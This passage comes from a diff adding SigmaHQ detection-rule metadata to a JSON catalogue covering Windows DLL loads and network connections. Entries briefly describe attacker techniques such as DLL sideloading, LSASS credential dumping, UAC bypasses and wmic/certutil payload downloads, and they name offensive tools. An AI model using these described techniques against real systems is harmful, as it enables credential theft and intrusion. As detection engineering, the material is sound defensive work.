"70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "value": "VMGuestLib DLL Sideload" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_web_browsers.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "value": "Web Browsers DLL Sideloading" + }, + { + "description": "Detects SILENTTRINITY stager use", + "meta": { + "author": "Aleksey Potapov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_silenttrinity_stage_use.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "value": "SILENTTRINITY Stager Execution - DLL" + }, + { + "description": "Detect DLL Load from Spooler Service backup folder", + "meta": { + "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "creation_date": "2021/06/29", + "falsepositive": [ + "Loading of legitimate driver" + ], + "filename": "image_load_spoolsv_dll_load.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/ly4k/SpoolFool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "value": "Windows Spooler Service Suspicious Binary Load" + }, + { + "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", + "meta": { + "author": "frack113", + "creation_date": "2022/02/03", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_advapi32_dll.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hlldz/Phant0m", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", + "value": "Suspicious Load of Advapi31.dll" + }, + { + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unikely" + ], + "filename": "image_load_susp_cmstp.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ] + }, + "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", + "value": "Cmstp Suspicious DLL Load" + }, + { + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "meta": { + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "creation_date": "2019/10/27", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_dbghelp_dbgcore_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", + "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", + "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", + "value": "Load of dbghelp/dbgcore DLL from Suspicious Process" + }, + { + "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_dll_load_system_process.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "value": "DLL Load By System Process From Suspicious Locations" + }, + { + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_susp_fax_dll.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/faxing-your-way-to-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "value": "Fax Service DLL Search Order Hijack" + }, + { + "description": "Detects any assembly DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "value": "dotNET DLL Loaded Via Office Applications" + }, + { + "description": "Detects CLR DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "value": "CLR DLL Loaded Via Office Applications" + }, + { + "description": "Detects any GAC DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "value": "GAC DLL Loaded Via Office Applications" + }, + { + "description": "Detects DSParse DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dsparse_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "value": "Active Directory Parsing DLL Loaded Via Office Applications" + }, + { + "description": "Detects Kerberos DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_kerberos_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "value": "Active Directory Kerberos DLL Loaded Via Office Applications" + }, + { + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "meta": { + "author": "Patrick St. John, OTR (Open Threat Research)", + "creation_date": "2020/05/03", + "falsepositive": [ + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" + ], + "filename": "image_load_susp_python_image_load.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.py2exe.org/", + "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.002" + ] + }, + "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "value": "Python Py2Exe Image Load" + }, + { + "description": "Detects CLR DLL being loaded by an scripting applications", + "meta": { + "author": "omkar72, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/tyranid/DotNetToJScript", + "https://thewover.github.io/Introducing-Donut/", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", + "value": "CLR DLL Loaded Via Scripting Applications" + }, + { + "description": "A General detection for processes loading System.Drawing.ni.dll. This could be an indicator of potential Screen Capture.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_system_drawing_load.yml", + "level": "low", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", + "value": "Suspicious System.Drawing Load" + }, + { + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/01/07", + "falsepositive": [ + "Very likely, needs more tuning" + ], + "filename": "image_load_susp_uncommon_image_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "value": "Possible Process Hollowing Image Loading" + }, + { + "description": "Detects the image load of VSS DLL by uncommon executables", + "meta": { + "author": "frack113", + "creation_date": "2022/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_vss_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/ORCx41/DeleteShadowCopies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "value": "Image Load of VSS Dll by Uncommon Executable" + }, + { + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "meta": { + "author": "Markus Neis, @markus_neis", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_vss_ps_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "value": "Image Load of VSS_PS.dll by Uncommon Executable" + }, + { + "description": "Detects DLL's Loaded Via Word Containing VBA Macros", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_winword_vbadll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "value": "VBA DLL Loaded Via Microsoft Word" + }, + { + "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "meta": { + "author": "SBousseaden", + "creation_date": "2019/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_svchost_dll_search_order_hijack.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ] + }, + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "value": "Svchost DLL Search Order Hijack" + }, + { + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Other DLLs with that import hash" + ], + "filename": "image_load_sysmon_disable_sharpevtmute.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "49329257-089d-46e6-af37-4afce4290685", + "value": "SharpEvtMute Imphash EvtMuteHook Load" + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "filename": "image_load_tttracer_mod_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ] + }, + "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "value": "Time Travel Debugging Utility Usage - Image" + }, + { + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_uac_bypass_iscsicpl.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://twitter.com/wdormann/status/1547583317410607110", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", + "value": "UAC Bypass Using Iscsicpl - ImageLoad" + }, + { + "description": "Attempts to load dismcore.dll after dropping it", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/06", + "falsepositive": [ + "Actions of a legitimate telnet client" + ], + "filename": "image_load_uac_bypass_via_dism.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" + ] + }, + "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", + "value": "UAC Bypass With Fake DLL" + }, + { + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Other legitimate processes loading those DLLs in your environment." + ], + "filename": "image_load_uipromptforcreds_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", + "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ] + }, + "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "value": "UIPromptForCredentials DLLs" + }, + { + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Valid user connecting using RDP" + ], + "filename": "image_load_unsigned_image_loaded_into_lsass.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "value": "Unsigned Image Loaded Into LSASS Process" + }, + { + "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/07", + "falsepositive": [ + "Rarely observed" + ], + "filename": "image_load_usp_svchost_clfsw32.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "value": "APT PRIVATELOG Image Load Pattern" + }, + { + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "value": "VMware Xfer Loading DLL from Nondefault Path" + }, + { + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/17", + "falsepositive": [ + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + ], + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", + "https://twitter.com/dez_/status/986614411711442944", + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ] + }, + "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "value": "WMIC Loading Scripting Libraries" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "value": "Wmiprvse Wbemcomn DLL Hijack" + }, + { + "description": "Detects non wmiprvse loading WMI modules", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wmi_module_load.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "value": "WMI Modules Loaded" + }, + { + "description": "Detects WMI command line event consumers", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ] + }, + "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "value": "WMI Persistence - Command Line Event Consumer" + }, + { + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wsman_provider_image_load.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://github.com/bohops/WSMan-WinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "value": "Suspicious WSMAN Provider Image Loads" + }, + { + "description": "Detects an executable in the Windows folder accessing github.com", + "meta": { + "author": "Michael Haag (idea), Florian Roth (rule)", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown", + "@subTee in your network" + ], + "filename": "net_connection_win_binary_github_com.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105", + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "value": "Microsoft Binary Github Communication" + }, + { + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_binary_susp_com.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "value": "Microsoft Binary Suspicious Communication Endpoint" + }, + { + "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/09/02", + "falsepositive": [ + "Legitimate certutil network connection" + ], + "filename": "net_connection_win_certutil.yml", + "level": "high", + "logsource.category": "network_connection", + 